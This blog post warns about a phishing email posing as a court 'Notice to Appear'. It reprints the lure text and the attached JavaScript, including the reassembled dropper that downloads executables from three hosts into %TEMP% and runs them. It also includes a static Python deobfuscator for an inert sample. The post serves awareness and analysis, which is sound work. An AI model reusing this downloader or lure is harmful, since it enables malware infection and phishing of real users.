Nothing to see here, folks, just move along. Another scam email from fraudsters trying to get me to download malware to my computer.
This time the JavaScript code wants to go out to startick.com, mrflapper.com, and ihaveavoice2.com (all of which are invalid top-level domains), and then download and install other nasty stuff to my computer.
Here’s the email that this came attached to:
Notice to Appear,
You have to appear in the Court on the July 27.
Please, prepare all the documents relating to the case and bring them to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.
You can review complete details of the Court Notice in the attachment.
Sincerely,
Jimmie Cowan,
Clerk of Court.
Attached: Notice_to_Appear_00928994.zip
function sah126() { return '00) {'; };
function sah125() { return ' == 2'; };
function sah210() { return '+fr+'; };
function sah86() { return 'ar dn'; };
function sah105() { return 'rea'; };
function sah95() { return 'bj'; };
But as soon as the code runs, it concatenates all those little bits into something that looks like this:
var stroke="55565C5E0D0A020B240507050001091D0B0203160105100A0117174A070B09";
function gvi() { return 'e'; }
function sah() { return 'val'; }
function dl(fr) {
  var b = "www.startick.com mrflapper.com ihaveavoice2.com".split(" ");
  for (var i=0; i<b.length; i++) {
    var ws = new ActiveXObject("WScript.Shell");
    var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+Math.round(Math.random()*100000000)+".exe";
    var dn = 0;
    var xo = new ActiveXObject("MSXML2.XMLHTTP");
    xo.onreadystatechange = function() {
      if (xo.readyState == 4 && xo.status == 200) {
        var xa = new ActiveXObject("ADODB.Stream");
        xa.open(); xa.type = 1; xa.write(xo.ResponseBody);
        if (xa.size > 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; };
        xa.close();
      };
    };
    try { xo.open("GET","http://"+b[i]+"/document.php?rnd="+fr+"&id="+stroke, false); xo.send(); } catch (er) {};
    if (dn == 1) break;
  };
};
dl(4851); dl(5382); dl(2753);
var po = '';
for (var ckz=1; ckz<=242; ckz++) { po += this['sah'+ckz](); }
this[gvi()+sah()](po);
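One way to see what an attachment like this would do without ever running it, as an added example (not code from the original post): the Python below reads the script as text, joins the numbered fragments in the order the loop would, and pulls out the download hosts and COM objects. The sample script, its a.example and b.example hosts, and the function names reassemble and indicators are constructed for this example.

```python
import re

# Constructed, inert sample in the same layout as the attachment: numbered
# string-returning functions, defined out of order, joined by a counting loop.
SAMPLE = r"""
function sah4() { return 'iveXObject("WScript.Sh'; }; function sah2() { return 'mple b.example".sp'; };
function sah6() { return 'ject("MSXML2.XMLHTTP");'; }; function sah1() { return 'var b = "a.exa'; };
function sah5() { return 'ell"); var xo = new ActiveXOb'; }; function sah3() { return 'lit(" "); var ws = new Act'; };
function gvi() { return 'e'; } function sah() { return 'val'; } var po = '';
for (var ckz=1; ckz<=6; ckz++) { po += this['sah'+ckz](); } this[gvi()+sah()](po);
"""

# One numbered fragment: function <prefix><N>() { return '<text>'; }
FRAG_RE = re.compile(r"function\s+([A-Za-z_]+)(\d+)\s*\(\)\s*\{\s*return\s+'([^']*)'\s*;\s*\}")
# The joining loop: for (var i=<first>; i<=<last>; ...) { ... this['<prefix>'+i]() ... }
LOOP_RE = re.compile(r"for\s*\(\s*var\s+(\w+)\s*=\s*(\d+)\s*;\s*\1\s*<=\s*(\d+)\s*;"
                     r".*?this\[\s*'(\w+)'\s*\+\s*\1\s*\]\(\)", re.S)

def reassemble(script):
    """Rebuild the string handed to eval by reading the script as text only."""
    frags = {(name, int(num)): body for name, num, body in FRAG_RE.findall(script)}
    loop = LOOP_RE.search(script)
    if loop is None:
        raise ValueError("no fragment-joining loop found")
    _, first, last, prefix = loop.groups()
    wanted = range(int(first), int(last) + 1)
    # A gap means the sample is truncated or uses a layout this parser does not know.
    missing = [i for i in wanted if (prefix, i) not in frags]
    if missing:
        raise ValueError(f"fragments not found: {missing}")
    return "".join(frags[(prefix, i)] for i in wanted)

def indicators(payload):
    """Pull out what a responder would block or hunt for."""
    # Hosts are stored as one space-separated string that the script splits.
    hosts = re.search(r'"([^"]+)"\s*\.split\(\s*" "\s*\)', payload)
    return {
        "hosts": hosts.group(1).split(" ") if hosts else [],
        "com_objects": re.findall(r'ActiveXObject\(\s*"([^"]+)"', payload),
    }

if __name__ == "__main__":
    payload = reassemble(SAMPLE)
    print(payload)
    print(indicators(payload))
```

Nothing in the attachment is executed at any point; the script is only ever treated as a string.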
I’ve mentioned these a few times before – the only way to keep yourself safe is to never open attachments you receive in email messages unless you are 100% sure whom they are from and what they are.
The bad actors want access to your data and your computer, and they don’t care how they get it.
Be careful out there.
The Old Wolf has spoken.
